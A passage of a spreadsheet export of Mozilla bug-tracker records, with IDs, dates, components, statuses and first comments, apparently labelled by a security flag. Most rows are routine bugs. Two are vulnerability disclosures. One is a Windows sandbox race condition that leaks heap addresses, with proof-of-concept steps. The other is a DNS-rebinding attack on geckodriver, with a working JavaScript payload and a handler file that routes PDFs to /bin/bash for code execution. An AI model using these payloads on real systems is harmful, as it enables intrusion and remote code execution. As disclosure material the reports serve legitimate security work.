    2011-01-15 00:05:30,853 DEBUG - make_connection, timeout = 5000
    2011-01-15 00:05:30,854 DEBUG - connection successful
    2011-01-15 00:05:30,854 DEBUG - MainThread - retry_wrapper_for_generators: about to retry function, iterator_for_all_legacy_to_be_processed
    2011-01-15 00:05:30,854 DEBUG - iterator_for_all_legacy_to_be_processed
    2011-01-15 00:05:30,855 DEBUG - limit = 1000000
    2011-01-15 00:05:30,892 DEBUG - Scanner 0 generated
    2011-01-15 00:05:33,989 DEBUG - Scanner 1 generated
    2011-01-15 00:05:36,717 DEBUG - Scanner 2 generated
    2011-01-15 00:05:39,313 DEBUG - Scanner 3 generated
    2011-01-15 00:05:42,384 DEBUG - Scanner 4 generated
    2011-01-15 00:05:45,318 DEBUG - Scanner 5 generated
    2011-01-15 00:05:48,259 DEBUG - Scanner 6 generated
    2011-01-15 00:05:50,741 DEBUG - Scanner 7 generated
    2011-01-15 00:05:55,740 DEBUG - MainThread - retry_wrapper_for_generators: handled exception, threading.currentThread().getName(), timed out
    2011-01-15 00:05:55,740 ERROR - MainThread - retry_wrapper_for_generators: failed too many times on this one operation, iterator_for_all_legacy_to_be_processed
    2011-01-15 00:05:55,741 DEBUG - MainThread - somethings gone horribly wrong with HBase
    2011-01-15 00:05:55,741 CRITICAL - MainThread Caught Error: socorro.hbase.hbaseClient.FatalException
    2011-01-15 00:05:55,741 CRITICAL - the connection is not viable.  retries fail:
    2011-01-15 00:05:55,741 CRITICAL - trace back follows:
      File "/data/breakpad/processor/socorro/monitor/monitor.py", line 353, in standardJobAllocationLoop
        for uuid in crashStorage.newUuids():
      File "/data/breakpad/processor/socorro/hbase/hbaseClient.py", line 106, in f
        for x in fn(self, *args, **kwargs):
      File "/data/breakpad/processor/socorro/hbase/hbaseClient.py", line 573, in iterator_for_all_legacy_to_be_processed
        ['ids:ooid'])):
      File "/data/breakpad/processor/socorro/hbase/hbaseClient.py", line 546, in merge_scan_with_prefix
        next_items_queue.append([next(),i,next])
      File "/data/breakpad/processor/socorro/hbase/hbaseClient.py", line 745, in salted_scanner_iterable
        raw_rows = client.scannerGet(scanner)
      File "/data/breakpad/processor_1/thirdparty/hbase/hbase.py", line 1892, in scannerGet
        return self.recv_scannerGet()
      File "/data/breakpad/processor_1/thirdparty/hbase/hbase.py", line 1903, in recv_scannerGet
        (fname, mtype, rseqid) = self._iprot.readMessageBegin()
      File "/data/breakpad/processor_1/thirdparty/thrift/protocol/TBinaryProtocol.py", line 126, in readMessageBegin
        sz = self.readI32()
      File "/data/breakpad/processor_1/thirdparty/thrift/protocol/TBinaryProtocol.py", line 203, in readI32
        buff = self.trans.readAll(4)
      File "/data/breakpad/processor_1/thirdparty/thrift/transport/TTransport.py", line 58, in readAll
        chunk = self.read(sz-have)
      File "/data/breakpad/processor_1/thirdparty/thrift/transport/TTransport.py", line 155, in read
        self.__rbuf = StringIO(self.__trans.read(max(sz, self.DEFAULT_BUFFER)))
      File "/data/breakpad/processor_1/thirdparty/thrift/transport/TSocket.py", line 92, in read
        buff = self.handle.recv(sz)
    2011-01-15 00:05:55,742 DEBUG - MainThread - standardLoop done.
    2011-01-15 00:05:55,742 DEBUG - MainThread - waiting to join.
    2011-01-15 00:05:55,801 DEBUG - priorityLoopingThread - outer detects quit
    2011-01-15 00:05:55,802 INFO - priorityLoopingThread - priorityLoop done.
    2011-01-15 00:05:55,807 DEBUG - jobCleanupThread - got quit message
    2011-01-15 00:05:55,807 INFO - jobCleanupThread - jobCleanupLoop done.
    2011-01-15 00:05:55,808 DEBUG - MainThread - calling databaseConnectionPool.cleanup().
    2011-01-15 00:05:55,808 DEBUG - MainThread - killing database connections
    2011-01-15 00:05:55,808 DEBUG - MainThread - connection MainThread already closed
    2011-01-15 00:05:55,808 DEBUG - MainThread - connection jobCleanupThread closed
    2011-01-15 00:05:55,808 DEBUG - MainThread - connection priorityLoopingThread closed
    2011-01-15 00:05:55,808 DEBUG - MainThread - crashStore MainThread closed</t>
        </is>
      </c>
      <c r="X1574" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1575">
      <c r="A1575" t="n">
        <v>696827</v>
      </c>
      <c r="B1575" t="inlineStr">
        <is>
          <t>2011-10-24 12:02:21 -0700</t>
        </is>
      </c>
      <c r="C1575" t="inlineStr">
        <is>
          <t>IOError: [Errno 2] No such file or directory: u'/tmp/tmp0yiC9z/packages/purukogi-2/purukogi-2.xpi'</t>
        </is>
      </c>
      <c r="D1575" t="inlineStr">
        <is>
          <t>2014-09-24 06:39:12 -0700</t>
        </is>
      </c>
      <c r="E1575" t="n">
        <v>1</v>
      </c>
      <c r="F1575" t="n">
        <v>1</v>
      </c>
      <c r="G1575" t="n">
        <v>6</v>
      </c>
      <c r="H1575" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I1575" t="inlineStr">
        <is>
          <t>addons.mozilla.org Graveyard</t>
        </is>
      </c>
      <c r="J1575" t="inlineStr">
        <is>
          <t>Add-on Builder</t>
        </is>
      </c>
      <c r="K1575" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1575" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1575" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1575" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1575" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1575" t="inlineStr"/>
      <c r="Q1575" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1575" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S1575" t="inlineStr">
        <is>
          <t>Builder 1.0</t>
        </is>
      </c>
      <c r="T1575" t="n">
        <v>1</v>
      </c>
      <c r="U1575" t="n">
        <v>0</v>
      </c>
      <c r="V1575" t="n">
        <v>5</v>
      </c>
      <c r="W1575" t="inlineStr">
        <is>
          <t>Frequent traceback being observed on prod, please advise.</t>
        </is>
      </c>
      <c r="X1575" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1576">
      <c r="A1576" t="n">
        <v>1701932</v>
      </c>
      <c r="B1576" t="inlineStr">
        <is>
          <t>2021-03-30 06:40:57 -0700</t>
        </is>
      </c>
      <c r="C1576" t="inlineStr">
        <is>
          <t>Password autofill is enabled on insecure pages</t>
        </is>
      </c>
      <c r="D1576" t="inlineStr">
        <is>
          <t>2021-11-22 23:46:02 -0800</t>
        </is>
      </c>
      <c r="E1576" t="n">
        <v>1</v>
      </c>
      <c r="F1576" t="n">
        <v>1</v>
      </c>
      <c r="G1576" t="n">
        <v>3</v>
      </c>
      <c r="H1576" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1576" t="inlineStr">
        <is>
          <t>GeckoView</t>
        </is>
      </c>
      <c r="J1576" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K1576" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1576" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1576" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N1576" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1576" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1576" t="inlineStr">
        <is>
          <t>[geckoview:m90][adv-main90+]</t>
        </is>
      </c>
      <c r="Q1576" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1576" t="inlineStr">
        <is>
          <t>S3</t>
        </is>
      </c>
      <c r="S1576" t="inlineStr">
        <is>
          <t>90 Branch</t>
        </is>
      </c>
      <c r="T1576" t="n">
        <v>1</v>
      </c>
      <c r="U1576" t="n">
        <v>0</v>
      </c>
      <c r="V1576" t="n">
        <v>11</v>
      </c>
      <c r="W1576" t="inlineStr">
        <is>
          <t>I generally consider autofill without user interaction problematic (see https://palant.info/2018/08/29/password-managers-please-make-sure-autofill-is-secure/#5-require-a-user-action-for-autofill). However, Mozilla already decided that it is a justified risk on secure websites, and that’s the behavior implemented on desktop. What’s different on mobile: autofill is also enabled for insecure websites (plain HTTP). This is because of `signon.autofillForms.http` preference being `true` by default on mobile but not on desktop.
I can see that this behavior was introduced in bug 1330111. I cannot see a discussion about security implications there, so I have to assume that this is an unintended side-effect. This change pre-dates Fenix, maybe things worked differently with Fennec.</t>
        </is>
      </c>
      <c r="X1576" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1577">
      <c r="A1577" t="n">
        <v>292723</v>
      </c>
      <c r="B1577" t="inlineStr">
        <is>
          <t>2005-05-03 04:28:54 -0700</t>
        </is>
      </c>
      <c r="C1577" t="inlineStr">
        <is>
          <t>pReconv-&gt;dwSize value is invalid</t>
        </is>
      </c>
      <c r="D1577" t="inlineStr">
        <is>
          <t>2005-05-05 00:20:47 -0700</t>
        </is>
      </c>
      <c r="E1577" t="n">
        <v>1</v>
      </c>
      <c r="F1577" t="n">
        <v>1</v>
      </c>
      <c r="G1577" t="n">
        <v>3</v>
      </c>
      <c r="H1577" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1577" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1577" t="inlineStr">
        <is>
          <t>Internationalization</t>
        </is>
      </c>
      <c r="K1577" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1577" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M1577" t="inlineStr">
        <is>
          <t>Windows XP</t>
        </is>
      </c>
      <c r="N1577" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1577" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1577" t="inlineStr"/>
      <c r="Q1577" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1577" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S1577" t="inlineStr">
        <is>
          <t>mozilla1.8beta2</t>
        </is>
      </c>
      <c r="T1577" t="n">
        <v>1</v>
      </c>
      <c r="U1577" t="n">
        <v>0</v>
      </c>
      <c r="V1577" t="n">
        <v>8</v>
      </c>
      <c r="W1577" t="inlineStr">
        <is>
          <t>in nsWindow.cpp#7060
http://lxr.mozilla.org/seamonkey/source/widget/src/windows/nsWindow.cpp#7060
the dwIndex is set sizeof(RECONVERTSTRING).
But it is invalid. we should set *oResult.
see
http://msdn.microsoft.com/library/default.asp?url=/library/en-us/intl/ime_58tu.asp
"dwSize
    Specifies the size of this structure *and the memory block it heads*."
On Win9x, if we reconvert with ATOK, it is crashed sometimes.
On WinXP, if we using MS-IME 2003, we cannot reconvert.</t>
        </is>
      </c>
      <c r="X1577" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1578">
      <c r="A1578" t="n">
        <v>429562</v>
      </c>
      <c r="B1578" t="inlineStr">
        <is>
          <t>2008-04-17 14:15:35 -0700</t>
        </is>
      </c>
      <c r="C1578" t="inlineStr">
        <is>
          <t>move mobile and moz2 masters to production-master</t>
        </is>
      </c>
      <c r="D1578" t="inlineStr">
        <is>
          <t>2013-08-12 21:54:08 -0700</t>
        </is>
      </c>
      <c r="E1578" t="n">
        <v>1</v>
      </c>
      <c r="F1578" t="n">
        <v>1</v>
      </c>
      <c r="G1578" t="n">
        <v>5</v>
      </c>
      <c r="H1578" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I1578" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J1578" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K1578" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L1578" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1578" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1578" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1578" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1578" t="inlineStr"/>
      <c r="Q1578" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R1578" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1578" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1578" t="n">
        <v>1</v>
      </c>
      <c r="U1578" t="n">
        <v>0</v>
      </c>
      <c r="V1578" t="n">
        <v>3</v>
      </c>
      <c r="W1578" t="inlineStr">
        <is>
          <t>Once the VM is created.</t>
        </is>
      </c>
      <c r="X1578" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1579">
      <c r="A1579" t="n">
        <v>1599008</v>
      </c>
      <c r="B1579" t="inlineStr">
        <is>
          <t>2019-11-24 23:52:25 -0800</t>
        </is>
      </c>
      <c r="C1579" t="inlineStr">
        <is>
          <t>Race condition in firefox!sandbox::CopyPolicyToTarget leading to Information Disclosure of broker heap address</t>
        </is>
      </c>
      <c r="D1579" t="inlineStr">
        <is>
          <t>2024-05-30 10:04:56 -0700</t>
        </is>
      </c>
      <c r="E1579" t="n">
        <v>1</v>
      </c>
      <c r="F1579" t="n">
        <v>1</v>
      </c>
      <c r="G1579" t="n">
        <v>3</v>
      </c>
      <c r="H1579" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1579" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1579" t="inlineStr">
        <is>
          <t>Security: Process Sandboxing</t>
        </is>
      </c>
      <c r="K1579" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1579" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1579" t="inlineStr">
        <is>
          <t>Windows</t>
        </is>
      </c>
      <c r="N1579" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1579" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1579" t="inlineStr">
        <is>
          <t>[fix in bug 1599005][reporter-external] [client-bounty-form] [verif?][adv-main72+][adv-esr68.4+]</t>
        </is>
      </c>
      <c r="Q1579" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1579" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1579" t="inlineStr">
        <is>
          <t>mozilla73</t>
        </is>
      </c>
      <c r="T1579" t="n">
        <v>1</v>
      </c>
      <c r="U1579" t="n">
        <v>0</v>
      </c>
      <c r="V1579" t="n">
        <v>10</v>
      </c>
      <c r="W1579" t="inlineStr">
        <is>
          <t>Created attachment 9111149
race.zip
Hi,
These issues only affects Windows client, I found two race condition in the shared memory of Firefox sandbox implementation.
* Information Disclosure of broker heap address in CopyPolicyToTarget (described in this issue)
* Memory corruption (Sandbox escape) in sandbox::SharedMemIPCServer::ThreadPingEventReady (described in issue 1599005)
# Vulnerability:
Since Firefox (current version tested 70.0.1) configures the renderer sandbox with USER_LIMITED and Initial Integrity Level == Delayed Integrity Level (INTEGRITY_LEVEL_LOW), any renderer process can interact with other renderers process (read/write/createthread/duplicatehandles) even while new renderer process bootstrapping (when a new tab process is spawned).
Google Chrome is not affected because the renderer processes runs with a USER_LOCKDOWN token (also the initial integrity level = LOW and delayed IL is UNTRUSTED) which prevent access to other renderer processes.
The race condition vulnerability happens during new process bootstrapping, when a new tab process is created, the broker does:
1/ CreateProcess SUSPENDED with the lockdown token (USER_LIMITED for Firefox renderer) and low IL in TargetProcess::Create
2/ Assign target process to JOB object
3/ Change target thread token to initial token (USER_RESTRICTED_SAME_ACCESS) for initialisation later
4/ Create IPCServer shared memory in TargetProcess::Init
5/ DuplicateHandle the shared memory with the target in TargetProcess::Init
6/ Copy policy and update pointers in CopyPolicyToTarget 
So, the target process is suspended but other tabs are not and they can access the target process (thanks to USER_LIMITED token and same IL) and duplicate the IPC shared memory handle.
A race condition exists when the policy is copied to the shared memory (containing broker heap addresses) before it updates policy-&gt;entry[i] pointers in CopyPolicyToTarget (6):
void CopyPolicyToTarget(const void* source, size_t size, void* dest) {
  if (!source || !size)
    return;
  memcpy(dest, source, size); // (A) dest is shared memory and source contains broker heap pointers
  sandbox::PolicyGlobal* policy =
      reinterpret_cast&lt;sandbox::PolicyGlobal*&gt;(dest);
  size_t offset = reinterpret_cast&lt;size_t&gt;(source);
  for (size_t i = 0; i &lt; sandbox::kMaxServiceCount; i++) {
    size_t buffer = reinterpret_cast&lt;size_t&gt;(policy-&gt;entry[i]);
    if (buffer) {
      buffer -= offset;
      policy-&gt;entry[i] = reinterpret_cast&lt;sandbox::PolicyBuffer*&gt;(buffer); // (B) remove the pointer base (race condition allows disclosure of heap address)
    }
  }
}
Source code:
https://github.com/mozilla/gecko-dev/blob/master/security/sandbox/chromium/sandbox/win/src/target_process.cc#L33
So, a compromised renderer can read the policy entries pointers before they are updated and it discloses broker heap addresses.
# Repro:
The provided POC (attachment payload_infoleak) often triggers the vulnerability.
Install Python 2.7 64 bits and PythonForWindows (https://github.com/hakril/PythonForWindows) then run inject.py with the payload_infoleak.dll path.
Debug the injected tab to verify the information disclosure (in debug output).
Then start new tabs to trigger the vulnerability (like a regular user would do) until it works.
RaceItLeak entry
Leaked worked: dp payload_infoleak!leak_heap L1: 0000022D3486B198
(4220.3bdc): Break instruction exception - code 80000003 (first chance)
KERNELBASE!wil::details::DebugBreak+0x2:
00007ff9`b3720192 cc              int     3
The address is a valid heap address in the broker process (you can verify using !address in the broker).
This information disclosure vulnerability allows an attacker to collect information that discloses the memory layout. 
In turn the attacker could use this information to deliver tailored exploits to bypass memory protection technologies such as ASLR for an additional LPE/RCE vulnerability.
Thank you</t>
        </is>
      </c>
      <c r="X1579" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1580">
      <c r="A1580" t="n">
        <v>1652612</v>
      </c>
      <c r="B1580" t="inlineStr">
        <is>
          <t>2020-07-13 16:19:47 -0700</t>
        </is>
      </c>
      <c r="C1580" t="inlineStr">
        <is>
          <t>DNS-rebinding vulnerability to RCE in geckodriver</t>
        </is>
      </c>
      <c r="D1580" t="inlineStr">
        <is>
          <t>2024-05-30 10:16:40 -0700</t>
        </is>
      </c>
      <c r="E1580" t="n">
        <v>1</v>
      </c>
      <c r="F1580" t="n">
        <v>1</v>
      </c>
      <c r="G1580" t="n">
        <v>3</v>
      </c>
      <c r="H1580" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1580" t="inlineStr">
        <is>
          <t>Testing</t>
        </is>
      </c>
      <c r="J1580" t="inlineStr">
        <is>
          <t>geckodriver</t>
        </is>
      </c>
      <c r="K1580" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1580" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1580" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N1580" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1580" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1580" t="inlineStr">
        <is>
          <t>[reporter-external] [client-bounty-form][post-critsmash-triage][adv-main92-]</t>
        </is>
      </c>
      <c r="Q1580" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1580" t="inlineStr">
        <is>
          <t>S1</t>
        </is>
      </c>
      <c r="S1580" t="inlineStr">
        <is>
          <t>92 Branch</t>
        </is>
      </c>
      <c r="T1580" t="n">
        <v>1</v>
      </c>
      <c r="U1580" t="n">
        <v>0</v>
      </c>
      <c r="V1580" t="n">
        <v>38</v>
      </c>
      <c r="W1580" t="inlineStr">
        <is>
          <t>geckodriver is vulnerable to DNS rebinding attack.
A malicious origin can send requests to a geckodriver instance
(create a new session, navigate, etc.).
In contrast to the CSRF vulnerability previously reported,
when using this vulnerability, an attacker can see the responses
of the attacked geckodriver instance and can thus interact
with the created session. This could be used:
* to attack local services (localhost-bound or on the local network);
* to attack remote services using the IP address of the victim;
* reading local files (by navigating to `file://`);
* running other programs by navigating to URIs with other schemes;
* remote code execution (see below).
This vulnerability has been tested on:
* Mozilla Firefox Nightly 80.0a1 (2020-07-13)
* geckodriver 0.26.0 (e9783a644016 2019-10-10 13:38 +0000)
* Debian testing
## Reproduction steps
1. Get a domaine name under your control (in this example I'm using `rebind.netlib.re` controlled using https://netlib.re/)
2. Run geckodriver, `geckodriver`
3. Serve the proof-of-concept (see attachment), `python3 -m http.server --bind 127.0.0.99 4444`
4. Associate your domain name to the IP address of the payload server with a short TTL (`@ A 5 127.0.99`)
5. Open this website in a web browser (`firefox http://rebind.netlib.re:4444`)
6. Associate your domain name to the IP address of the geckodriver instance (`@ A 5 127.0.1`))
7. Wait (appoximately one minute) for the browser to hit the geckodriver instance
This process can be automated (and accelerated) using dedicated DNS rebinding frameworks.
Payload:
~~~js
function sleep(delay) {
  return new Promise((resolve, reject) =&gt; {setInterval(resolve, delay);});
}
async function createSession() {
  while (true) {
    const response = await fetch("/session", {
        method: "POST",
        mode: "same-origin",
        headers: {
            'Content-Type': 'application/json'
        },
        body: JSON.stringify({
          "capabilities": {
            "alwaysMatch": {
            }
          }
        })
    });
    if (response.status &gt;= 200 &amp;&amp; response.status &lt; 300)
      return response.json();
    await sleep(1000);
  }
}
async function main() {
  const creation = await createSession();
  const sessionId = creation.value.sessionId;
  const sessionPath = "/session/" + sessionId;
  fetch(sessionPath + "/url", {
    method: "POST",
    mode: "same-origin",
    headers: {
      'Content-Type': 'application/json',
    },
    body: JSON.stringify({
      "url": "https://www.youtube.com/watch?v=oHg5SJYRHA0"
    })
  });
}
main()
~~~
## Getting remote code execution
As the attacker can control the Firefox instance, we can now find
new ways to execute arbitrary shell commands (`see main2.html`).
By using the `profile` parameters, the attacker can set this `handlers.json` file:
~~~json
{"defaultHandlersVersion":{"fr":3},"mimeTypes":{"application/pdf":{"action":2,"extensions":["pdf"],"handlers":[{"name":"bash","path":"/bin/bash"}]}},"schemes":{"irc":{"stubEntry":true,"handlers":[null,{"name":"Mibbit","uriTemplate":"https://www.mibbit.com/?url=%s"}]},"ircs":{"stubEntry":true,"handlers":[null,{"name":"Mibbit","uriTemplate":"https://www.mibbit.com/?url=%s"}]},"mailto":{"stubEntry":true,"handlers":[null,{"name":"Yahoo! Mail","uriTemplate":"https://compose.mail.yahoo.com/?To=%s"},{"name":"Gmail","uriTemplate":"https://mail.google.com/mail/?extsrc=mailto&amp;url=%s"}]}}}
~~~
Using this configuration file, the Firefox instance will use
`/bin/bash` for opening PDF file.
The PDF we are going to serve is actually a bash script:
~~~sh
xterm -e nyancat
~~~
The attacker can redirect the Firefox instance under his control
to this shell script (served as a PDF): Firefox will use
`bash` to open this file. Using this construct the
attacker can execute an arbitrary system command as the user.
## Mitigations
### Checking the Host header
geckodriver is vulnerable to DNS rebinding attacks because it is accepting
requests using arbitrary `Host` header (eg. `Host: rebind.netlib.re`).
By checking the value of the `Host` header and enforcing values such as
`localhost:4444`, we can prevent DNS rebinding attacks.
### HTTP-level Authentication
As previously discussed, adding (opt-in) HTTP-level authentication
would prevent a wide range of attacks (including attacks from local users)
if this feature were to be supported by WebDriver clients.
### PF_LOCAL Socket
As previously discussed, adding an options for using PF_LOCAL
socket would prevent a wide range of attacks
if this feature were to be supported by WebDriver clients.</t>
        </is>
      </c>
      <c r="X1580" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1581">
      <c r="A1581" t="n">
        <v>809064</v>
      </c>
      <c r="B1581" t="inlineStr">
        <is>
          <t>2012-11-06 08:40:35 -0800</t>
        </is>
      </c>
      <c r="C1581" t="inlineStr">
        <is>
          <t>Uninitialized value usage in ./mailnews/base/src/nsMsgDBView.cpp</t>
        </is>
      </c>
      <c r="D1581" t="inlineStr">
        <is>
          <t>2024-05-30 07:51:46 -0700</t>
        </is>
      </c>
      <c r="E1581" t="n">
        <v>1</v>
      </c>
      <c r="F1581" t="n">
        <v>1</v>
      </c>
      <c r="G1581" t="n">
        <v>3</v>
      </c>
      <c r="H1581" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1581" t="inlineStr">
        <is>
          <t>MailNews Core</t>
        </is>
      </c>
      <c r="J1581" t="inlineStr">
        <is>
          <t>Backend</t>
        </is>
      </c>
      <c r="K1581" t="inlineStr">
        <is>
          <t>19</t>
        </is>
      </c>
      <c r="L1581" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1581" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N1581" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1581" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1581" t="inlineStr">
        <is>
          <t>[adv-main18+][adv-esr17+][adv-esr10+]</t>
        </is>
      </c>
      <c r="Q1581" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1581" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1581" t="inlineStr">
        <is>
          <t>Thunderbird 20.0</t>
        </is>
      </c>
      <c r="T1581" t="n">
        <v>1</v>
      </c>
      <c r="U1581" t="n">
        <v>0</v>
      </c>
      <c r="V1581" t="n">
        <v>36</v>
      </c>
      <c r="W1581" t="inlineStr">
        <is>
          <t>Uninitialized value usage in ./mailnews/base/src/nsMsgDBView.cpp
Found by valgrind run. See bug 803816 about mozmill run of TB.
Source version:
comm-central thunderbird.
$ hg identify
1016cef82fd8+ tip
ishikawa@debian-vm:~/TB-NEW/TB-3HG/new-src$ cd mozilla
ishikawa@debian-vm:~/TB-NEW/TB-3HG/new-src/mozilla$ hg identify
a517f7ea5bef+ tip
Valgrind log
==30518== Conditional jump or move depends on uninitialised value(s)
==30518==    at 0x5B8F829: nsMsgDBView::GetInsertIndexHelper(nsIMsgDBHdr*, nsTArray&lt;unsigned int, nsTArrayDefaultAllocator&gt;&amp;, nsCOMArray&lt;nsIMsgFolder&gt;*, int, int) (nsMsgDBView.cpp:5227)
==30518==    by 0x5B908A1: nsMsgDBView::GetInsertIndex(nsIMsgDBHdr*) (nsMsgDBView.cpp:5301)
==30518==    by 0x5B9D103: nsMsgSearchDBView::InsertHdrFromFolder(nsIMsgDBHdr*, nsIMsgFolder*) (nsMsgSearchDBView.cpp:655)
==30518==    by 0x5B9DDCD: nsMsgSearchDBView::OnSearchHit(nsIMsgDBHdr*, nsIMsgFolder*) (nsMsgSearchDBView.cpp:691)
==30518==    by 0x5BCC450: nsMsgSearchSession::AddSearchHit(nsIMsgDBHdr*, nsIMsgFolder*) (nsMsgSearchSession.cpp:549)
==30518==    by 0x5BC5EBC: nsMsgSearchOfflineMail::AddResultElement(nsIMsgDBHdr*) (nsMsgLocalSearch.cpp:788)
==30518==    by 0x5BC7D24: nsMsgSearchOfflineMail::Search(bool*) (nsMsgLocalSearch.cpp:741)
==30518==    by 0x5BC49A1: nsMsgSearchScopeTerm::TimeSlice(bool*) (nsMsgSearchTerm.cpp:1881)
==30518==    by 0x5766379: XPCWrappedNative::CallMethod(XPCCallContext&amp;, XPCWrappedNative::CallMode) (XPCWrappedNative.cpp:3132)
==30518==    by 0x576DC97: XPC_WN_CallMethod(JSContext*, unsigned int, JS::Value*) (XPCWrappedNativeJSOps.cpp:1488)
==30518==    by 0x66D2880: js::InvokeKernel(JSContext*, JS::CallArgs, js::MaybeConstruct) (jscntxtinlines.h:364)
==30518==    by 0x66C4414: js::Interpret(JSContext*, js::StackFrame*, js::InterpMode) (jsinterp.cpp:2369)
==30518==    by 0x66D18AC: js::RunScript(JSContext*, JS::Handle&lt;JSScript*&gt;, js::StackFrame*) (jsinterp.cpp:324)
==30518==    by 0x66D296F: js::InvokeKernel(JSContext*, JS::CallArgs, js::MaybeConstruct) (jsinterp.cpp:379)
==30518==    by 0x66D3037: js::Invoke(JSContext*, JS::Value const&amp;, JS::Value const&amp;, unsigned int, JS::Value*, JS::Value*) (jsinterp.h:109)
==30518==    by 0x6712C1A: js::IndirectProxyHandler::call(JSContext*, JSObject*, unsigned int, JS::Value*) (jsproxy.cpp:456)
==30518==    by 0x67820EB: js::DirectWrapper::call(JSContext*, JSObject*, unsigned int, JS::Value*) (jswrapper.cpp:390)
==30518==    by 0x6784837: js::CrossCompartmentWrapper::call(JSContext*, JSObject*, unsigned int, JS::Value*) (jswrapper.cpp:722)
==30518==    by 0x67184C3: js::Proxy::call(JSContext*, JSObject*, unsigned int, JS::Value*) (jsproxy.cpp:2478)
==30518==    by 0x671851A: proxy_Call(JSContext*, unsigned int, JS::Value*) (jsproxy.cpp:3038)
==30518==    by 0x66D2AB8: js::InvokeKernel(JSContext*, JS::CallArgs, js::MaybeConstruct) (jscntxtinlines.h:364)
==30518==    by 0x66C4414: js::Interpret(JSContext*, js::StackFrame*, js::InterpMode) (jsinterp.cpp:2369)
==30518==    by 0x66D18AC: js::RunScript(JSContext*, JS::Handle&lt;JSScript*&gt;, js::StackFrame*) (jsinterp.cpp:324)
==30518==    by 0x66D296F: js::InvokeKernel(JSContext*, JS::CallArgs, js::MaybeConstruct) (jsinterp.cpp:379)
==30518==    by 0x66D3037: js::Invoke(JSContext*, JS::Value const&amp;, JS::Value const&amp;, unsigned int, JS::Value*, JS::Value*) (jsinterp.h:109)
